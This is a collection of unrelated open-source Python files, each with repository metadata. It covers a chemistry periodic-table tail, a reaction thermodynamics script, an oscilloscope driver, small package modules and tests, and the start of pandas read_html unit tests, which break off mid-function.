250.07831652, 251.080760172, 252.084310, 253.086880, 254.090600,
251.079586788, 237.062070, 238.061410, 239.062422, 240.062302, 241.063726,
242.063701552, 243.065427, 244.066000689, 245.068048612, 246.068805309,
247.071000589, 248.072184861, 249.074853537, 250.076406066, 251.079586788,
252.081625846, 253.085133145, 254.087322909, 255.091046, 256.093440,
252.082978512, 240.068920, 241.068538, 242.069745, 243.069548, 244.070883,
245.071324, 246.072896, 247.073656, 248.075471, 249.076411, 250.078612,
251.079992142, 252.082978512, 253.084824697, 254.088022021, 255.090273122,
256.093598, 257.095979, 258.099520, 257.095104724, 242.073430, 243.074353,
244.074084, 245.075385, 246.075299023, 247.076847, 248.077194714,
249.079034, 250.079521264, 251.081575017, 252.082466855, 253.085185236,
254.08685422, 255.089962202, 256.091773117, 257.095104724, 258.097076,
259.100595, 260.102678, 258.098431319, 245.080829, 246.081886, 247.081635,
248.082823, 249.083013, 250.084420, 251.084839, 252.086560, 253.087280,
254.089656, 255.091082705, 256.094059025, 257.095541368, 258.098431319,
259.100509, 260.103652, 261.105721, 262.108865, 255.093241131, 248.086596,
249.087833, 250.087510, 251.089012, 252.088976521, 253.090678,
254.090955253, 255.093241131, 256.094282666, 257.09687719, 258.098207,
259.101031, 260.102643, 261.105749, 262.107301, 263.110552, 264.112345,
260.105504, 251.094360, 252.095371, 253.095210, 254.096454, 255.096681,
256.098629, 257.099555, 258.101814, 259.102901, 260.105504, 261.106883,
262.109634, 263.111293, 264.114038, 265.115839, 266.119305, 263.112547,
253.100689, 254.100184, 255.101340, 256.101166194, 257.102990,
258.103489, 259.105637, 260.106440, 261.108766556, 262.109925, 263.112547,
264.113985, 265.116704, 266.117956, 267.121529, 268.123644, 255.107398,
255.107398, 256.108127, 257.107722, 258.109231, 259.109610, 260.111300,
261.112056, 262.114084, 263.114988, 264.117404, 265.118601, 266.121029,
267.122377, 268.125445, 269.127460, 270.130712, 259.114500, 258.113168,
259.114500, 260.114422071, 261.116117, 262.116398, 263.118322, 264.118931,
265.121114693, 266.122065, 267.124425, 268.125606, 269.128755, 270.130329,
271.133472, 272.135158, 273.138220, 262.122892, 260.121970, 261.121664,
262.122892, 263.123035, 264.124604, 265.125147, 266.126942, 267.127650,
268.129755, 269.130694, 270.133616, 271.135179, 272.138032, 273.139618,
274.142440, 275.144250, 263.128558, 263.128558, 264.128394885, 265.130085,
266.130097, 267.131789, 268.132162, 269.134056, 270.134650, 271.137657,
272.139052, 273.141986, 274.143131, 275.145952, 276.147208, 277.149841,
265.136151, 265.136151, 266.137299, 267.137307, 268.138728, 269.139055,
270.140657, 271.141139, 272.143738, 273.144913, 274.147492, 275.148647,
276.151156, 277.152420, 278.154812, 279.156193, 281.162061, 267.144341,
268.143795, 269.145124, 270.144720, 271.146062, 272.146317, 273.148863,
274.149492, 275.152176, 276.153034, 277.155647, 278.156469, 279.158861,
280.159795, 281.162061, 272.153615, 272.153615, 273.153682, 274.155713,
275.156142, 276.158493, 277.159519, 278.161604, 279.162468, 280.164473,
281.165372, 282.167486, 283.168415, 283.171792, 277.163943, 278.164312,
279.166546, 280.167039, 281.169286, 282.169765, 283.171792, 284.172384,
285.174105, 283.176451, 283.176451, 284.178080, 285.178732, 286.180481,
287.181045, 285.183698, 285.183698, 286.183855, 287.185599, 288.185689,
289.187279, 287.191186, 287.191186, 288.192492, 289.192715, 290.194141,
291.194384, 292.199786, 289.198862, 290.198590, 291.200011, 292.199786,
291.206564, 291.206564, 292.207549, 293.214670, 293.214670]
el2mass = dict(zip(_temp_symbol, _temp_mass))
el2mass["GH"] = 0. # note that ghost atoms in Cfour have mass 100.
eliso2mass = dict(zip(_temp_iso_symbol, _temp_iso_mass)) # encompasses el2mass
eliso2mass["GH"] = 0. # note that ghost atoms in Cfour have mass 100. # encompasses el2mass
#eliso2mass["X0"] = 0. # probably needed, just checking
el2z = dict(zip(_temp_symbol, _temp_z))
el2z["GH"] = 0
z2mass = dict(zip(_temp_z, _temp_mass))
z2el = dict(zip(_temp_z, _temp_symbol))
z2element = dict(zip(_temp_z, _temp_element))
| kratman/psi4public | psi4/driver/qcdb/periodictable.py | Python | gpl-2.0 | 78,237 | 0.013434 |
# -*- coding: utf-8 -*-
"""
calculate thermodynamics for Katja
"""
from component_contribution.kegg_reaction import KeggReaction
from component_contribution.kegg_model import KeggModel
from component_contribution.component_contribution import ComponentContribution
from component_contribution.thermodynamic_constants import R, default_T
import csv
import numpy as np
import uncertainties.unumpy as unumpy
def reaction2dG0(reaction_list):
'''
Calculates the dG0 of a list of a reaction.
Uses the component-contribution package (Noor et al) to estimate
the standard Gibbs Free Energy of reactions based on
component contribution approach and measured values (NIST and Alberty)
Arguments:
List of reaction strings
Returns:
Array of dG0 values and standard deviation of estimates
'''
cc = ComponentContribution.init()
Kmodel = KeggModel.from_formulas(reaction_list)
Kmodel.add_thermo(cc)
dG0_prime, dG0_std = Kmodel.get_transformed_dG0(pH=7.5, I=0.2, T=298.15)
dG0_prime = np.array(map(lambda x: x[0,0], dG0_prime))
dG0_prime = unumpy.uarray(dG0_prime, np.diag(dG0_std))
return dG0_prime
def reaction2Keq(reaction_list):
'''
Calculates the equilibrium constants of a reaction, using dG0.
Arguments:
List of cobra model reaction objects
Returns:
Array of K-equilibrium values
'''
dG0_prime = reaction2dG0(reaction_list)
Keq = unumpy.exp( -dG0_prime / (R*default_T) )
return Keq
def reaction2RI(reaction_list, fixed_conc=0.1):
'''
Calculates the reversibility index (RI) of a reaction.
The RI represent the change in concentrations of metabolites
(from equal reaction reactants) that will make the reaction reversible.
That is, the higher RI is, the more irreversible the reaction.
A convenient threshold for reversibility is RI>=1000, that is a change of
1000% in metabolite concentrations is required in order to flip the
reaction direction.
Arguments:
List of cobra model reaction objects
Returns:
Array of RI values
'''
keq = reaction2Keq(reaction_list)
sparse = map(lambda x: KeggReaction.parse_formula(x).sparse, reaction_list)
N_P = np.zeros(len(sparse))
N_S = np.zeros(len(sparse))
for i,s in enumerate(sparse):
N_P[i] = sum([v for v in s.itervalues() if v>0])
N_S[i] = -sum([v for v in s.itervalues() if v<0])
N = N_P + N_S
Q_2prime = fixed_conc**(N_P-N_S)
RI = ( keq*Q_2prime )**( 2.0/N )
return RI
if __name__ == "__main__":
reactions = csv.reader(open('CCMtbRxnsKEGG.txt', 'r'))
names = []
reaction_list = []
for row in reactions:
row = row[0].split(" ")
names.append(row[0].replace("'", ''))
reaction_list.append(row[1])
dG0 = reaction2dG0(reaction_list)
Keq = reaction2Keq(reaction_list)
RI = reaction2RI(reaction_list)
reversibility_index = dict(zip(names, RI))
f = open('reversibility_index.csv','w')
w = csv.writer(f)
for k,v in reversibility_index.iteritems():
w.writerow([k, v])
f.close() | KatjaT/Thermodynamics | katja_thermo.py | Python | mit | 3,325 | 0.010827 |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2017 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent90000 import *
class agilentMSOX92804A(agilent90000):
"Agilent Infiniium MSOX92804A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'MSOX92804A')
super(agilentMSOX92804A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 16
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 28e9
self._init_channels()
| alexforencich/python-ivi | ivi/agilent/agilentMSOX92804A.py | Python | mit | 1,692 | 0.004728 |
#! /usr/bin/python
# -*- coding: utf-8 -*-
from . import agent
# Import them to register agents.
from .rule_based import basic
__author__ = 'fyabc'
def get_agent_by_name(name):
return agent.Agent.AgentClasses[name]
__all__ = [
'get_agent_by_name',
]
| fyabc/MiniGames | HearthStone2/MyHearthStone/ai/standard.py | Python | mit | 265 | 0 |
#!/usr/bin/env python
from ethereum.tools import tester
from ethereum.tools.tester import TransactionFailed
from pytest import fixture, mark, raises
@fixture(scope='session')
def testerSnapshot(sessionFixture):
sessionFixture.uploadAndAddToController('solidity_test_helpers/ReentrancyGuardHelper.sol')
ReentrancyGuardHelper = sessionFixture.contracts['ReentrancyGuardHelper']
return sessionFixture.createSnapshot()
@fixture
def testerContractsFixture(sessionFixture, testerSnapshot):
sessionFixture.resetToSnapshot(testerSnapshot)
return sessionFixture
def test_nonReentrant(testerContractsFixture):
ReentrancyGuardHelper = testerContractsFixture.contracts['ReentrancyGuardHelper']
assert ReentrancyGuardHelper.testerCanReentrant()
with raises(TransactionFailed):
ReentrancyGuardHelper.testerCanNotReentrant()
| AugurProject/augur-core | tests/libraries/test_reentrancy_guard.py | Python | gpl-3.0 | 855 | 0.005848 |
''' Provides a command line application for Bokeh.
The following subcommands are available:
'''
from __future__ import absolute_import
def _build_docstring():
global __doc__
from . import subcommands
for cls in subcommands.all:
__doc__ += "%8s : %s\n" % (cls.name, cls.help)
_build_docstring()
del _build_docstring
| phobson/bokeh | bokeh/command/__init__.py | Python | bsd-3-clause | 340 | 0.005882 |
'''
Test ACS columns
'''
from tasks.util import shell
# TODO clean this up in a more general init script
try:
shell('createdb test')
except:
pass
from nose.tools import with_setup
from tasks.us.census.lodes import WorkplaceAreaCharacteristicsColumns
from tests.util import runtask, setup, teardown
@with_setup(setup, teardown)
def test_wac_columns_run():
runtask(WorkplaceAreaCharacteristicsColumns())
| CartoDB/bigmetadata | tests/us/census/test_lodes.py | Python | bsd-3-clause | 423 | 0.004728 |
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "table"}
)
with tm.assert_produces_warning(FutureWarning):
df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
df1 = self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "table"}
)
df2 = self.read_html(url, match="Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
